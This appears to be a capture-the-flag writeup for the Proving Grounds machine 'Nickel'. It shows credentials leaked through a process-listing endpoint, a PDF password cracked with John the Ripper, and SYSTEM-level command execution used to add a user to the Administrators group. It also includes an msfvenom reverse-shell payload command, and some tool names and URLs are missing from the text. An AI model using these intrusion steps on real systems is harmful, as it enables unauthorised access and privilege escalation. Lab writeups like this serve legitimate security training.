Writeup for Nickel from Offensive Security Proving Grounds (PG)

Information Gathering

Service Enumeration -H -t full -H -t vulns

SMB (139)

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f python


On port 8089, we have a dashboard:

Each of the links bring us to By going to instead, we get a Not Found response for /list-current-deployments.

We get a different message, however, for /list-running-procs.

If we send a POST request instead, we indeed see a list of running processes!

In the command line of one of the processes, we get a user's credentials.

Plugging the -p parameter into CyberChef, we can see that it is a Base 64 encoded password (NowiseSloopTheory139)

Using the credentials ariah:NowiseSloopTheory139, we can SSH into the server.

Privilege Escalation

Using previously found credentials for ariah, we can access the FTP service and download a PDF file.

However, a password is required. The previously found password does not work.

Use to extract the hash.

perl john-bleeding-jumbo/run/ Infrastructure.pdf > Infrastructure-Hash.txt

Use John the Ripper to crack the hash.

john --wordlist=/usr/share/wordlists/rockyou.txt Infrastructure-Hash.txt

The password is ariah4168.

Here, we find a 'Temporary Command endpoint' at http://nickel/ that is only accessible through the remote machine.

Using Powershell, we can send a GET request to the API endpoint.

$Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing

This executes whoami, and we can see the output below.

We have RCE as SYSTEM. However, any outgoing traffic is blocked, so we cannot spawn a second reverse shell as SYSTEM. Let's do the next best thing - adding ourselves to the Administrators group.

localgroup Administrators ariah /add

If we check the Administrators group again (net localgroup Administrators), we can see that our user ariah was added.

Now, we can RDP into the machine and run the command prompt as Administrator.

Last updated